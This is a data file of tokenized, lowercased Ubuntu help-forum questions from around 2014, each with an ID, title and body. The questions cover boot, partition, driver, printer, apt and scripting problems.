491424	14.04lts installed on usb stick goes into screen dim	installed 14.04lts on a usb stick and system will randomly dim the screen and freeze up for several seconds like it 's going into powersave mode . i have tried all of the screen settings including the 'never ' turn off and changed the power management to 'do n't suspend ' but it still does it . any ideas ?
491425	grub not working after windows 8.1 update on ubuntu 12.04 lts	i do understand that this is a common problem , and i have read few of the threads . here is synopsis of my problem . logged on to window 8.1 , windows installed updates and now grub2 does n't work laptop is a toshiba c55-a secure boot is disable turn off fast startup booted with ubuntu 12.04 lts live cd by pressing c accessed grub prompt exited out of grub at which point was able to access boot manager with windows boot manager , ubuntu , ubuntu options selected ubuntu booted into ubuntu sudo add-apt-repository ppa : yannubuntu/boot-repair & & sudo apt-get update sudo apt-get install -y boot-repair & & ( boot-repair & ) selected recommended repair http : //paste.ubuntu.com/7743525/ http : //paste.ubuntu.com/7760191/ the output on boot tab from msconfig ( windows command prompt ) shows only windows 8.1 the output from the bcdedit is as follows windows boot manager -- -- -- -- -- -- -- -- -- -- identifier { bootmgr } device partition=\device\harddiskvolume2 path \efi\microsoft\boot\bootmgfw.efi description windows boot manager locale en-us inherit { globalsettings } default { current } resumeobject { xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx } displayorder { current } toolsdisplayorder { memdiag } timeout 30 windows boot loader -- -- -- -- -- -- -- -- -- - identifier { current } device partition=c : path \windows\system32\winload.efi description windows 8.1 locale en-us inherit { bootloadersettings } recoverysequence { xxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx } recoveryenabled yes isolatedcontext yes allowedinmemorysettings 0x15000075 osdevice partition=c : systemroot \windows resumeobject { xxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx } nx optin bootmenupolicy standard detecthal yes did not see the grub2 menu as expected ? any other ideas references restore backup of winefi or uefi ( not sure ) that boot-repair made unable to run ubuntu 12.04 without usb flash drive recovering grub after installing windows 8.1 grub not showing on startup for windows 8.1 ubuntu 13.10 dual boot
491432	am i correct that in 14.01 partman can not move or copy partitions ?	i am installing dual-boot ubuntu 14.04 on a new offer of hp , an hp110-220z amd-64 architecture . it looks to be the 2014 standard entry level computer . the 500 gb hard drive has four partitions , but partman displays more information than windows drive manager . note : portions in brackets [ ] are from the windows drive manager ( wdm ) display . free space 1 mb /dev/sda1 ntfs 1072 mb [ 1023 mb recovery partition ] /dev/sda2 efi 377 mb [ efi system partition ] /dev/sda3 unknown 134 mb [ not listed in wdm ] /dev/sda4 ntfs 482995 mb [ 449.82 gb c : / boot , page file , crash dump ] /dev/sda5 ntfs 15552 mb [ d : / oem recovery image ] free space 5 mb sda5 is also customers copy of windows 8.1 , also ntfs and a windows d : / drive . therein lies the problem . having gone through the pain of making a usb ntfs boot-able drive and backing up windows , i am suspicious that microsoft still has n't got it right , or cares . and yes , this is how hp partitioned it . i assume the free spaces are because hp aligned partitions on the even mb boundaries . what is interesting and scary is that the windows drive manager does not recognize or list these portions of free space . to create space for ubuntu it has to come out of c : / . partman handle this just fine . even confirmed it in windows disk manager after rebooting . if partman can not move or copy d : / this leaves the only place for the ubuntu partitions between c : / and d : / . with 30 years of dos and windows experience , i find that a very troubling scenario . partman has a screen display with buttons in 14.01 but the change button and the edit partition dialogue it invokes does not include any options for moving or copying . nor can i find any notes in any documentation to date other than for earlier ubuntu versions . if both hp and toshiba are partitioning hard disks this way i can only assume other computer manufactures are too . and that this will be a common challenge for any one wanting to add ubuntu to a new computer . i am documenting this install for the purpose of at least submitting it to the documentation group as a case study on a 2014 machine . current documentation is one size fits all years and i hope i can help reduce that confusion . to do that i would appreciate your help here . a few answers would also help me in composing a bug report about these features . is debian then what i should use and recommend . i have been studying documentation . there is no doubt of its robustness and dangers for the less than expert installer . or am i just not finding the way to the move or copy functions in the version of partman that is loaded by the ubuntu installer ? are my fears of leaving a hpfs recovery d : / partition out beyond the ubuntu partitions and the problems of accessing it using the manufacturers dos based utilities real ? help me to know which parts of this complex question need to be asked where and if any , what bug reports are needed .
491435	how to install an hp c4700 photosmart printer	i 'm trying to install an hp c4700 photosmart printer . it came with a software cd which i have in my cd drive , but i 'm not sure how to use it . as with windows it just popped up and i believe a wizard took over from there . no , the printer is not connected to my wireless yet and it does n't have an ethernet cable . this is a brand new printer for me . how do i go about doing this ?
491436	how to scale indicator icons	anyone knows if unity has a way to scale down all indicator icons to have the same height ? this big icons are very annoying . example :
491437	how to run g++ output files	i compiled my c++ program with g++ and i can only run the output with ./programname . is there any way i can just double click the file to run it ?
491443	opengl glx context is not using direct rendering 14.10	i have steam installed with foss radeon driver . steam runs ok with out-of-the-box driver . when i install latest radeon with x-swat or xoerg-edgers , this error pops out . adding myself to `` video '' group didnt worked . opengl vendor string : x.org opengl renderer string : gallium 0.4 on amd aruba opengl core profile version string : 3.3 ( core profile ) mesa 10.3.0-devel opengl core profile shading language version string : 3.30 opengl core profile context flags : ( none ) opengl core profile profile mask : core profile opengl core profile extensions : opengl version string : 3.0 mesa 10.3.0-devel opengl shading language version string : 1.30 opengl context flags : ( none ) opengl extensions : edit : i dont know how but this solved my issue . rename libgcc_s.so.1 from /home/username/.local/share/steam/ubuntu12_32/steam-runtime/i386/lib/i386-linux-gnu
491449	error occurred while mounting /boot	i wanted to remove windows 7 and ubuntu 13.10 from my laptop and just create one partition for ubuntu 14.04 , but this seems to be more difficult then i thought it would be . installation seems to go perfect , but the first time i boot my pc i get a black rectangle with a small border of a few pixels in an other color ( i think the computer is trying to load grub ) . the second time i try to boot grub appears . but then i get a screen with an error : an error occurred while mounting /boot . press s to skip mounting or m for manual recovery . i have already tried a few things like formatting the whole disk and reinstalling , but this gives the same problem . grep boot /etc/fstab gives : /boot was on /dev/sda1 during installation uuid=8f1dc104-1ba0-4783-9b16-4302e24855ce /boot ext2 defaults 0 2 blkid | grep ext gives : /dev/sda1 : uuid= '' 8f1dc104-1ba0-4783-9b16-4302e24855ce '' sec_type= '' ext2 '' type= '' ex4 '' /dev/mapper/ubuntu -- vg-root : uuid= '' 32787824-e81d-4a6a-92b5-ba7ca2ac6875 '' type= '' ext4 '' i used the boot repair program which i found here and i still got the same problem . the output of the program is this : http : //paste.ubuntu.com/7750787/ all extra input about in which direction i need to seek is more then welcome !
491450	metacity freezing for 30 seconds due to some futex	when logged in to my ubuntu 12.04 workstation , doing relatively benign things like tab-autocompleting in a terminal , switching workspaces , moving windows , etc . can result in metacity freezing for 30 seconds . following the steps here to diagnose the issue , i first compared pre- and during-freeze states with ps axo pid , wchan:32 , cmd > [ not- ] frozen.txt , then diff revealed : $ diff frozen.txt not_frozen.txt 142c142 < 7135 futex_wait_queue_me metacity -- - > 7135 poll_schedule_timeout metacity looking in more depth at metacity with a trace shows it tied up in that 'futex ' for exactly 30 seconds ( ( sudo strace -p 11773 3 > & 1 1 > & 2- 2 > & 3- ) | awk ' { print strftime ( `` % y- % m- % d % h : % m : % s '' ) , $ 0 ; fflush ( ) ; } ' > metacity-trace.txt ) : 2014-07-03 15:49:50 clone ( child_stack=0xac1982a4 , flags=clone_vm|clone_fs|clone_files|clone_sighand|clone_thread|clone_sysvsem|clone_settls|clone_parent_settid|clone_child_cleartid , parent_tidptr=0xac198ba8 , { entry_number:6 , base_addr:0xac198b40 , limit:1048575 , seg_32bit:1 , contents:0 , read_exec_only:0 , limit_in_pages:1 , seg_not_present:0 , useable:1 } , child_tidptr=0xac198ba8 ) = 8659 2014-07-03 15:49:50 futex ( 0x9a55228 , futex_unlock_pi_private , 161978120 ) = 0 2014-07-03 15:49:50 futex ( 0x9a7970c , futex_wait_requeue_pi_private , 1 , null , 0x9a55228 ) = 0 2014-07-03 15:49:50 futex ( 0x9a55228 , futex_unlock_pi_private , 161978120 ) = 0 2014-07-03 15:50:20 futex ( 0x9a7970c , futex_wait_requeue_pi_private , 3 , null , 0x9a55228 ) = 0 2014-07-03 15:50:20 futex ( 0x9a55228 , futex_unlock_pi_private , 122875892 ) = 0 2014-07-03 15:50:20 send ( 15 , `` w '' , 1 , msg_nosignal ) = -1 enotsock ( socket operation on non-socket ) that was under unity 2d , if i use gnome classic , the same thing happens when trying to switch desktops ( but it 's not as sensitive to autocompleting in terminal ) . 2014-07-03 16:07:31 clone ( child_stack=0xb21fe2a4 , flags=clone_vm|clone_fs|clone_files|clone_sighand|clone_thread|clone_sysvsem|clone_settls|clone_parent_settid|clone_child_cleartid , parent_tidptr=0xb21feba8 , { entry_number:6 , base_addr:0xb21feb40 , limit:1048575 , seg_32bit:1 , contents:0 , read_exec_only:0 , limit_in_pages:1 , seg_not_present:0 , useable:1 } , child_tidptr=0xb21feba8 ) = 12693 2014-07-03 16:07:31 futex ( 0x98424e8 , futex_unlock_pi_private , 160065584 ) = 0 2014-07-03 16:07:31 futex ( 0x98a6834 , futex_wait_requeue_pi_private , 1 , null , 0x98424e8 ) = -1 eagain ( resource temporarily unavailable ) 2014-07-03 16:07:31 futex ( 0x98424e8 , futex_unlock_pi_private , 160065584 ) = 0 2014-07-03 16:08:01 futex ( 0x98a6834 , futex_wait_requeue_pi_private , 3 , null , 0x98424e8 ) = 0 2014-07-03 16:08:01 futex ( 0x98424e8 , futex_unlock_pi_private , 13762548 ) = 0 2014-07-03 16:08:01 send ( 14 , `` w '' , 1 , msg_nosignal ) = -1 enotsock ( socket operation on non-socket )
491452	wine and ip camera tool	i installed an ip camera tool using wine in ubuntu 14.04 lts , in order to configure ip cameras . the ip camera tool 's icon is on my desktop , but when i double click on it , the application does not open . what could it be wrong ?
491453	14.04 red circle with white line	please can someone help . following an update to 14.04. i got the red circle i ran sudo rm /var/lib/apt/lists/* -vf sudo apt-get update and got e : problem with mergelist /var/lib/apt/lists/repository.spotify.com_dists_stable_non-free_i18n_translation-en % 5fgb e : the package lists or status file could not be parsed or opened .
491454	toshiba wo n't install ubuntu	toshiba satellite laptop with windows 8 , i am trying to install ubuntu 14.04 . i set the boot mode to csm boot , turning off secure boot . the computer boots up on my usb stick to the ununtu menu , but when i select install or try live the screen goes blank and that 's it . i 've tried several times . so far not a fan of uefi ; -p thanks in advance jake
491455	mouse wheel over luncher icon	unity allows to switch between windows of open programs by moving mouse wheel over launcher icon . after mouse wheel is moved old windows disappear and new one appear . i would like to change configuration to prevent disappearing of old program window so it should start behave more like alt-tab . how could i configure it ?
491462	gnome3.10 on ubuntu 13.10 top bar icons missing along with icons in the activies bar	after today 's ( 3.06 ) last updates i get this bug , shown on the pictures . i do n't know if someone else is experiencing this , faced it before . also when i press the super button and want to open a program i can see neither the letters nor the program 's icon . sorry but i need 10 reputation to post images so please check them from the links below . ! [ top bar ] [ 1 ] ! [ activities bar ] [ 2 ] thanks http : //i.stack.imgur.com/trb3v.png http : //i.stack.imgur.com/tqdm4.png
491465	low level issue- battery issue	i have installed xubunto instead of machintosh on my macbook pro machine , when i close the screen the apple lamp on the back of my laptop does n't goes off , and the laptop runs out of power . how can i control this back lamp to be on or off ? ? , is there away to disable it from my linux ?
491467	why does ubuntu either detect the size of hosting os window or not ?	i have installed ubuntu 12.04.4 under oracle virtual box 4.3.12 and found that ubuntu sometimes detects the size of hosting windows and sometimes not . i want it always detects . how to ensure this ?
491471	mplayer aalib missing ( `` -vo aa '' not working )	i 've just figured out that i 'm unable to use aalib to render video output in mplayer . for those who do not know , aalib is the library for rendering videos in ascii . before upgrading to 14.04 it worked perfectly ( i do n't remember setting-up something , it had been working `` out of the box '' ) . here is what it does : $ mplayer -vo aa * mplayer2 2.0-701-gd4c5b7f-2ubuntu2 ( c ) 2000-2012 mplayer team can not open file '/home/crysman/.mplayer/input.conf ' : no such file or directory failed to open /home/crysman/.mplayer/input.conf . can not open file '/etc/mplayer/input.conf ' : no such file or directory failed to open /etc/mplayer/input.conf . playing tpb.afk.2013.480p.h264-simonklose.mp4 . detected file format : quicktime / mov ( libavformat ) [ lavf ] stream 0 : video ( h264 ) , -vid 0 [ lavf ] stream 1 : audio ( mp3 ) , -aid 0 , -alang eng clip info : major_brand : mp42 minor_version : 0 compatible_brands : mp42isomavc1 creation_time : 2013-02-08 13:49:43 encoder : handbrake 0.9.8 2012071700 load subtitles in . sub : added subtitle file ( 1 ) : ./tpb.afk.2013.480p.h264-simonklose.srt error opening/initializing the selected video_out ( -vo ) device . selected audio codec : mpeg 1.0/2.0/2.5 layers i , ii , iii [ mpg123 ] audio : 48000 hz , 2 ch , s16le , 128.0 kbit/8.33 % ( ratio : 16000- > 192000 ) ao : [ pulse ] 48000hz 2ch s16le ( 2 bytes per sample ) video : no video starting playback ... a : 8.1 ( 08.0 ) of 4927.1 ( 1:22:07.1 ) 0.4 % exiting ... ( quit ) it does the same with any other video as well : ... error opening/initializing the selected video_out ( -vo ) device . ... and ... video : no video ... here is a little bit of mplayer debug : $ mplayer -vo help mplayer2 2.0-701-gd4c5b7f-2ubuntu2 ( c ) 2000-2012 mplayer team available video output drivers : vdpau vdpau with x11 xv x11/xv gl3 opengl 3.x gl opengl x11 x11 ( ximage/shm ) sdl sdl yuv/rgb/bgr renderer ( sdl v1.1.7+ only ! ) caca libcaca v4l2 v4l2 mpeg video decoder output null null video output directfb direct framebuffer device yuv4mpeg yuv4mpeg output for mjpegtools png png file jpeg jpeg file gif89a animated gif output tga targa output pnm ppm/pgm/pgmyuv file md5sum md5sum of each frame gl_nosw opengl no software rendering some system info : $ uname -a & & lsb_release -a & & cat /etc/os-release linux crysman-u36sd 3.13.0-29-generic # 53-ubuntu smp wed jun 4 21:00:20 utc 2014 x86_64 x86_64 x86_64 gnu/linux no lsb modules are available . distributor id : ubuntu description : ubuntu 14.04 lts release : 14.04 codename : trusty name= '' ubuntu '' version= '' 14.04 , trusty tahr '' id=ubuntu id_like=debian pretty_name= '' ubuntu 14.04 lts '' version_id= '' 14.04 '' home_url= '' http : //www.ubuntu.com/ '' support_url= '' http : //help.ubuntu.com/ '' bug_report_url= '' http : //bugs.launchpad.net/ubuntu/ '' how do i make it work again , please ? : ( may it be because i abandoned restricted and multiverse ? i doubt it , just feeding info ... thanks ! ! mcz
491474	independent hp keeps turning on	this question is pretty straight forward , i have to manually turn independent hp off through alsamixer every now and then or else my headphones wo n't output audio . this setting will be on for 4 or 5 sessions and then its back to on . ive tried alsa ctl store but this wont solve the problem .
491475	can the installation of a pdf printer make a canon printer not to print ?	the canon printers under linux have been constant sources of pain . the issue of not being able to print using a canon printer has been discussed a number of times . ( actually , the issue of canon printer pops up in this forum now and then and they are too many to enumerate ) . anyway , so far as my experience goes in the last two years , there has never been a definite diagnostic process chalked out . see also this question . yesterday , i had an strange experience which though may seem far fetched , i feel it necessary to report here since it may be useful to others . moreover , i want to understand what really happened here . last night , in the late hours , my canon lbp6000 suddenly stopped printing . none of the empirical practices undertaken worked . then i started thinking about the recent changes made so far in my machine . the only one i could find is installing a cups pdf printer . out of desperation , i removed this printer ( apt-get purge ) , rebooted my machine , and the canon printer started working again . now , the question is , do you really think there is a connection between the pdf printer and the canon printer where the former may make the latter stop printing ? any technical details which can be included in the answer may become helpful to the frustrated community of canon printer owners under linux . update i have tested by re-adding the cups-pdf printer , and the results look inconclusive .
491476	how to uninstall spotify	i have a big error warning in my ubuntu 14 because of spotify . this the error : e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/repository.spotify.com_dists_stable_non-free_i18n_translation-en % 5fus e : the package lists or status file could not be parsed or opened . e : _cache- > open ( ) failed , please report . i want to uninstall this program , how to do it ?
491479	no speex packages for freeswitch building on ubuntu	i am trying to build freeswitch on ubuntu and getting numerous libraries absent . one of them is speex . configure says it is absent while dpkg says it is here : checking for speex > = 1.2rc1 speexdsp > = 1.2rc1 ... package speex was not found in the pkg-config search path . perhaps you should add the directory containing `speex.pc ' to the pkg_config_path environment variable no package 'speex ' found package speexdsp was not found in the pkg-config search path . perhaps you should add the directory containing `speexdsp.pc ' to the pkg_config_path environment variable no package 'speexdsp ' found configure : error : library requirements ( speex > = 1.2rc1 speexdsp > = 1.2rc1 ) not met ; consider adjusting the pkg_config_path environment variable if your libraries are in a nonstandard prefix so pkg-config can find them . dims @ nebula2 : ~/src/freeswitch $ dpkg -l *speex* desired=unknown/install/remove/purge/hold | status=not/inst/conf-files/unpacked/half-conf/half-inst/trig-await/trig-pend |/ err ? = ( none ) /reinst-required ( status , err : uppercase=bad ) ||/ name version description +++-================================-================================-================================================================================ ii libspeex1 1.2~rc1-3ubuntu2 the speex codec runtime library ii libspeexdsp1 1.2~rc1-3ubuntu2 the speex extended runtime library ii speex 1.2~rc1-3ubuntu2 the speex codec command line tools why ? and how to fix ?
491482	deja dup restoring backup gives me black screen	i have made an full system backup , but when i restore the backup it is giving me black screen . and gives me unable to boot to login screen
491484	accidentally delete ubuntu installation	i have win 7 on my machine and installed ubuntu as dual boot . while cleaning up some unwanted files i accidentally deleted my ubuntu installations as well . now every time i boot my machine , i still get the dual boot option and when i try to use the ubuntu option it says corrupted . can you please advise how can i get rid of this misleading option and do a complete fresh installation . thanks !
491487	ubuntu external hdd login error	i have ubuntu installed on my external hard drive . it runs pretty decently until i leave it for a minute . once it comes out of suspension , it asks for my password . after entering my password , the input box disappears and i get a message saying i entered the incorrect password . after pushing the power button to restart my pc , ubuntu logs in normally but i get a message saying i have an error . after reporting the error , none of my programs show up in the dash . nothing short of reinstalling ubuntu can fix this and after reinstalling it happens again ! can anyone help ?
491490	why wubi installer try to download iso file from internet ?	i want to install ubuntu with wubi , i follow this link . when i select my drive and click on next button , wubi try to download ubuntu-13.04-desktop-amd64.iso.torrent . why this problem occured ? i have this file structure : > ubuntu-13.04-desktop-i386\ > wubi.exe > ubuntu-13.04-desktop-i386.iso
491494	resize earlier boot partition	i installed win7 as a dual boot with ubuntu 14.04 `` just in case '' i ever needed a windows program that just could n't be emulated , but i have n't really run into the problem yet . instead , i 'd like to take all of /dev/sb1 ( or at a minimum the free space of it ) and add it to /dev/sdb5 . is that possible to do without problems , and if so what is the best way to go about it ?
491501	desktop gray-out and back to normal	i am using ubuntu 12.04 lts 64bit desktop ( running on laptop core i7-2670qm cpu with 16gb of ram , 500 gb ( less than 25 % in use ) ) . the problem is , occasionally a window will gray-out and unresponsive ( say libre office , or geany text editor ) . 10 seconds later , the gray thing disappeared and the application is responsive again . the cpu is not busy at that moment , i can hear the fan is not blowing very hard . sometimes , i do have the cpu busy and i can see it from both from `` top -c '' command and from the sound of fan . strangely , it did n't cause any gray-out . any idea what may be the cause . thanks !
491504	trying to install minecraft ( spigot version ) in lubuntu desktop	i set up a minecraft server super easily on my windows server . but lubuntu is much harder ! i have installed java , but i ca n't get anything to go from there ! nothing boots , i ca n't install a wrapper , i ca n't launch bat files ! what am i doing wrong ?
491505	xubuntu 14.04 kernel panic	i am trying to install xubuntu 14.04 desktop i386 on an older pc ( ~2002 ) by using plop boot manager and a bootable usb flash drive . the installation process begins but eventually crashes with this message : http : //i60.tinypic.com/27wrlfp.jpg pc specs : memory : 1.5 gb hard drive : 40 gb cd rw drive cpu : amd athlon xp 2000+ 1.67 ghz video card : nvidia geforce4 ti 4200 64 mb motherboard : asus a7v333-x acpi bios revision 1002 bios built date : 10/22/02 questions : is this due to an incompatibility between the kernel version and pc hardware ? if so , what is the correct way to resolve this error ? thank you : )
491506	second monitor recognized but only black screen	i am running 12.04 on a toshiba portege laptop . the graphics card is an intel 945gm/gms . the 2nd monitor is an asus ( ancor communications 22 '' ) . when i connect the monitor to the computer the monitor is recognized but nothing is displayed . there is only a black screen . the monitor is not receiving any signal from the computer .
491507	optical drive not recognized after 14.04 update	just installed updates in 14.04 . prior to updates the cd\dvd drive was recognized by both admin and standard user accounts . after updates can only access in admin . standard user message is do n't have required permissions . how do i set permissions for standard user to cd/dvd drive ?
491509	how to get dialog box input directed to a variable ?	i have been teaching myself bash scripting and have run into an issue . i have written a script to take input from the user , using the 'read ' command , and make that input a variable to use later in the script . the script works , but ... . i would like to be able to get it setup using 'dialog ' . i found out that 'dialog -- inputbox ' will direct the output to 'stderr ' and in order to get that input as a variable you have to direct it to a file and then retrieve it . the code i found to explain this is : # ! /bin/bash dialog -- inputbox \ '' what is your username ? '' 0 0 2 > /tmp/inputbox.tmp. $ $ retval= $ ? input=`cat /tmp/inputbox.tmp. $ $ ` rm -f /tmp/inputbox.tmp. $ $ case $ retval in 0 ) echo `` your username is ' $ input ' '' ; ; 1 ) echo `` cancel pressed . `` ; ; esac i see that it is sending the sdterr to the /tmp/inputbox.tmp. $ $ with 2 > , but the output file looks like 'inputbox.tmp.21661 ' . when i try and cat the file it gives me an error . so i am still unable to get the user input from the -- inputbox as a variable . example script : echo `` what app would you like to remove ? `` read dead_app sudo apt-get remove -- purge $ dead_app so as you can see it is a basic script . is it even possible to get the variable as a word from dialog -- inputbox ?
491511	14.04 desktop ldap login	quick question with 14.04 , i cant get the prompt to allow ldap logins , on the login screen . before 14.04 , i used to run : /usr/lib/lightdm/lightdm-set-defaults -m true which allows me to type in usernames , but this file no longer exists .
491513	software center ca n't start due to dbus proxy issue or sso client issue	software center ca n't open from gui of my newly installed 14.04lts desktop . tried update and upgrade , it does n't work . tried 'sudo apt-get install -- reinstall software-center ' , it does n't work as well . tried to launch it from terminal , it gives me the following errors : tony @ udesktop : ~ $ software-center 2014-07-04 12:30:44,059 - softwarecenter.ui.gtk3.app - info - setting up proxy 'none' 2014-07-04 12:30:44,111 - softwarecenter.fixme - warning - logs to the root logger : ' ( '/usr/lib/python2.7/dist-packages/dbus/proxies.py ' , 410 , '_introspect_error_handler ' ) ' 2014-07-04 12:30:44,111 - dbus.proxies - error - introspect error on com.ubuntu.sso : /com/ubuntu/sso/credentials : dbus.exceptions.dbusexception : org.freedesktop.dbus.error.spawn.childexited : process /usr/lib/ubuntu-sso-client/ubuntu-sso-login exited with status 1 traceback ( most recent call last ) : file `` /usr/bin/software-center '' , line 130 , in < module > app = softwarecenterappgtk3 ( options , args ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 338 , in __init__ self.icons ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/session/appmanager.py '' , line 66 , in __init__ self.oauth_token = helper.find_oauth_token_sync ( ) file `` /usr/share/software-center/softwarecenter/backend/ubuntusso.py '' , line 141 , in find_oauth_token_sync sso.find_credentials ( ) file `` /usr/share/software-center/softwarecenter/backend/login_impl/login_sso.py '' , line 74 , in find_credentials self.proxy.find_credentials ( self.appname , self._get_params ( ) ) file `` /usr/lib/python2.7/dist-packages/dbus/proxies.py '' , line 70 , in __call__ return self._proxy_method ( *args , **keywords ) file `` /usr/lib/python2.7/dist-packages/dbus/proxies.py '' , line 145 , in __call__ **keywords ) file `` /usr/lib/python2.7/dist-packages/dbus/connection.py '' , line 651 , in call_blocking message , timeout ) dbus.exceptions.dbusexception : org.freedesktop.dbus.error.spawn.childexited : process /usr/lib/ubuntu-sso-client/ubuntu-sso-login exited with status 1 anything else i can do here ?
491515	ubuntu terribly slow , barely able to move mouse	this is my first time trying ubuntu . i burned a dvd with version 14.04 and installed it alongside windows 7 . the machine here is an amd athlon 2 at 3ghz and 64 bit with 2gb of ram . after booting ubuntu it goest to the desktop screen the icons down the left hand side . after 1/2 minute the mouse pointer shows up but the pointer is almost frozen : if i move the mouse a bit the pointer on screen will move maybe 30 seconds later . i did get it over to one of the icons and clicked on it but nothing happened . i have a new usb mouse by the way and it works fine on the windows side . i have limited computer knowledge compared to most people on this site . do i need more horse power to run this version ? just stumped as what to ask even .
491516	how do i configure xscreensaver to use the gnome lockscreen on ubuntu 14.04 ?	i 'd like xscreensaver to lock my session using the standard gnome lockscreen , instead of using the horrible 1990 's xscreensaver lockscreen prompt ( sorry guys but it needs a facelift ) . i know this is possible because i have this configuration working on a different machine , but i do n't believe anything special was performed to make it happen . i have ubuntu 14.04 64bit installed on my laptop , and have removed gnome-screensaver using `` sudo apt-get remove gnome-screensaver '' . i 've added an entry to the startup applications to run `` xscreensaver -no-splash '' . if i wait 5 minutes , the screensaver starts up as expected , however when i move the mouse i find it returns me to an unlocked session . in case you 're wondering , yes i 'm waiting until after short timeout where it would otherwise allow me to wake up the session without needing to type your password . i 've tried playing around with various configurations under system settings / brightness & lock . the options i 've tried setting are ensuring that `` lock '' is enabled , and setting `` lock screen after '' to 5 minutes . however this seems to have no effect . i was actually wondering if this was due to the removal of gnome-screensaver . i 've tried following the steps under the apps man page , however it requests me to modify /usr/share/applications/gnome-screensaver-preferences.desktop which does n't exist ( i believe because gnome-screensaver-preferences is no longer shipped with gnome-screensaver , and is uninstalled in any case ) . i then found a slightly different version of the man page here : http : //manpages.ubuntu.com/manpages/lucid/man1/xscreensaver.1.html under the gnome heading it asks you to modify the same file as before , that also does n't exist . i 'm at a bit of a loss really . i would have thought that if xscreensaver was configured to not lock the screen , but have ubuntu configured to lock the screen , then the 2 should work together . so i 'm wondering if they 're conflicting somehow ? appreciate any and all help . thanks .
491517	error when installing apache 2 on ubuntu 14.04	when i install the apache2 in my ubuntu there is an error like this : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package apache2-bin
491518	ubuntu 14.04 lts no sound after apt-get upgrade	my ubuntu 14.04 lts desktop , it was working fine initially.i just did an apt-get upgrade , after that on with sound . any ideal how to fix this ? thanks
491519	public key is messing ?	i get this error when i update the system : w : gpg error : http : //ppa.launchpad.net trusty release : the following signatures could n't be verified because the public key is not available : no_pubkey 241fe6973b765fae is there something to work it out ?
491520	downloading and opening instillation file	why am i unable to open these files after downloading ? ubuntu-14.04-desktop-amd64 or ubuntu-14.04-desktop-i386 i get a message that `` application not found ''
491522	trouble downloading updates due to 404 error `` failed to fetch ''	i have got trouble downloading updates due to 404 error failed to fetch w : failed to fetch http : //vn.archive.ubuntu.com/ubuntu/dists/trusty/universe/source/sources 404 not found [ ip : 91.189.92.200 80 ] e : some index files failed to download . they have been ignored , or old ones used instead . how to solve this error ?
491533	unable to mount dvd - ubuntu 14.04	i seldom use the dvd drive and this a 5 year old laptop . today i load the dvd and it just keeps spinning but nothing mounts . after it spins and stops i checked : dmesg | grep sr0 [ 1.738204 ] sr0 : scsi3-mmc drive : 24x/24x writer dvd-ram cd/rw xa/form2 cdda tray [ 1.738551 ] sr 1:0:0:0 : attached scsi cd-rom sr0 i tried to manually mount with sudo mount /dev/sr0 sudo mount /dev/cdrom then i checked : mount | grep `` /dev/sr '' it shows nothing . the dvd is good and readable on my windows machine . any ideas on how i can get it working ?
491536	unable to find a medium containing a live file system vaio windows	when i tried to install ubuntu alongside my windows 8.1 os , it showed me the message 'unable to find a medium containing a live file system ' . my laptop is a vaio e series vpceh36ea . i 'm new to the ubuntu . i was wondering if there is any way to fix this ?
491537	local apt repository for specific packages	i 'm trying to set up an apt repository on my local network that will work similar to apt-mirror except , i do n't want to mirror an entire repository , i only want to serve specific packages of my choosing . i need to be able to download the packages i want from the public apt repositories and serve them from mine . i 've had a look into apt-mirror , apt-cacher and reprepo . apt-mirror does n't look like it will work as it mirrors an entire repository and automatically downloads updates , which i want to do manually . apt-cacher just caches packages downloaded by people on the network so that 's not what i 'm looking for either . reprepro looks like it is what i want but i ca n't figure out how make it serve packages i download from public repositories . everything i have managed to find uses reprepro to create , sign and serve your own packages that are n't in official repositories . how would i go about setting this up and adding specific packages ? i do n't want to resign the packages myself , i would rather leave them signed by the public repository . i would also like to control what happens if the client tries to install a package that is not in this repository , i 'm not sure what exactly i want to do in this situation yet but i 'm tossing up between blocking/disallowing the download , and redirecting them to the public repository . edit : for this to work would i need each package to be set-up exactly the same as it is on the public repository ? ie . would it need to be in the same sub directories ( stable , testing , main , contrib , etc ) and have the same entry in the packages.gz file ? if so , how would i find out all this information about the package and is there an automatic way to ensure it is correct in my repository ? much like apt-mirror/apt-cache how they automatically copy the official repo ?
491543	methods of installing software in ubuntu ( command-line )	i want to get information on what are different methods to install softwares/applications in ubuntu ( 14.04 ) ? example like : install by apt-get install from package-source or build-dependencies compile from source using binary package install downloaded debs by dpkg etc from my knowledge but give right & appropriate different methods . so , it can be knowledge base for new users to aware from different method and when to use which ? i am talking about different command-line methods rather than gui or software-center because of knowledge-base and package-management .
491544	bluetooth health device profile ( hdp )	can we change bluetooth class file ? how replace bluetooth class file to bluetooth hdp , from ubuntu terminal
491546	facebook chat client on ubuntu 14.04	i 'd like to install & configure a facebook chat client on ubuntu 14.04 14.04 trusty tahr to increase my collaboration & work flow with other students in a group chat . if at all possible i would enjoy the ability to run the client from terminal ( in my case , terminator ) . my intitial investigation pathway is below . previous question : is there an facebook messenger app answer leads me to here but at the address it says : '' application will stop working on march 3 , 2014 . no lead . '' reference 2 : integrate facebook messenger ( not chat or facebook ) the answer to this question is using the gui alternative `` empathy '' which is ok . but is it possible to run empathy without a gui from terminal ? still looking for possible solutions . regards ,
491547	xfce no event sounds and no sound changin feedback	i have xubuntu 14.04 installed on a macbook pro 2010 15 inches . when i change the sound , i have no feedback unlike other de i have used , like gnome . there is no notification sound when an event notification appears as well . what should i do ?
491551	android development environment for ubuntu 14.04	i have installed 32bit ubuntu 14.04 on my old laptop . i want to setup android development environment to build kernel . please guide which version of android kernel should i use and if there is easy steps , please point me . thank you
